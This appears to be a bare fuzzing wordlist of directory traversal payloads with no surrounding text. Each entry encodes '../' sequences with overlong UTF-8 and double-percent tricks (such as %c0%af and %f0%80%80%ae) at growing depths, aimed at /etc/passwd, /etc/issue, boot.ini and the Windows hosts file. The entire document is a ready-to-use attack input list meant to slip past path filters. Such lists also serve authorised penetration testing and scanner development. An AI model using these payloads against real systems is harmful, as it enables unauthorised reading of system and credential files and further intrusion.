-%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cboot.ini -%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cetc%25c1%259cpasswd -%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cetc%25c1%259cissue -%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cboot.ini -%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cetc%25c1%259cpasswd -%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cetc%25c1%259cissue -%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cboot.ini -%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259c%f0%80%80%ae%f0%80%80%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%f0%80%80%ae%f0%80%80%ae%25c0%25afetc%25c0%25afpasswd -%f0%80%80%ae%f0%80%80%ae%25c0%25afetc%25c0%25afissue -%f0%80%80%ae%f0%80%80%ae%25c0%25afboot.ini -%f0%80%80%ae%f0%80%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afetc%25c0%25afpasswd -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afetc%25c0%25afissue -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afboot.ini -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afetc%25c0%25afpasswd -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afetc%25c0%25afissue -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afboot.ini -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afetc%25c0%25afpasswd -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afetc%25c0%25afissue -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afboot.ini -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afetc%25c0%25afpasswd -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afetc%25c0%25afissue -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afboot.ini -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afetc%25c0%25afpasswd -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afetc%25c0%25afissue -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afboot.ini -%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25af%f0%80%80%ae%f0%80%80%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%f0%80%80%ae%f0%80%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%f0%80%80%ae%f0%80%80%ae%f0%80%80%afetc%f0%80%80%afissue -%f0%80%80%ae%f0%80%80%ae%f0%80%80%afboot.ini -%f0%80%80%ae%f0%80%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afetc%f0%80%80%afissue -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afboot.ini -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afetc%f0%80%80%afissue -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afboot.ini -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afetc%f0%80%80%afissue -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afboot.ini -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afetc%f0%80%80%afissue -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afboot.ini -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afetc%f0%80%80%afpasswd -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afetc%f0%80%80%afissue -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afboot.ini -%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afboot.ini -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afboot.ini -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afboot.ini -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afboot.ini -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afboot.ini -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afboot.ini -%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%af%f0%80%80%ae%f0%80%80%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae/etc/passwd -%f8%80%80%80%ae%f8%80%80%80%ae/etc/issue -%f8%80%80%80%ae%f8%80%80%80%ae/boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae/windows/system32/drivers/etc/hosts -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/etc/passwd -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/etc/issue -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/windows/system32/drivers/etc/hosts -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/etc/passwd -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/etc/issue -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/windows/system32/drivers/etc/hosts -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/etc/passwd -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/etc/issue -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/windows/system32/drivers/etc/hosts -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/etc/passwd -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/etc/issue -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/windows/system32/drivers/etc/hosts -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/etc/passwd -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/etc/issue -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/%f8%80%80%80%ae%f8%80%80%80%ae/windows/system32/drivers/etc/hosts -%f8%80%80%80%ae%f8%80%80%80%ae\etc\passwd -%f8%80%80%80%ae%f8%80%80%80%ae\etc\issue -%f8%80%80%80%ae%f8%80%80%80%ae\boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae\windows\system32\drivers\etc\hosts -%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\etc\passwd -%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\etc\issue -%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\windows\system32\drivers\etc\hosts -%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\etc\passwd -%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\etc\issue -%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\windows\system32\drivers\etc\hosts -%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\etc\passwd -%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\etc\issue -%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\windows\system32\drivers\etc\hosts -%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\etc\passwd -%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\etc\issue -%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\boot.ini -%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\windows\system32\drivers\etc\hosts -%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\etc\passwd -%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\etc\issue -%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\boot.ini 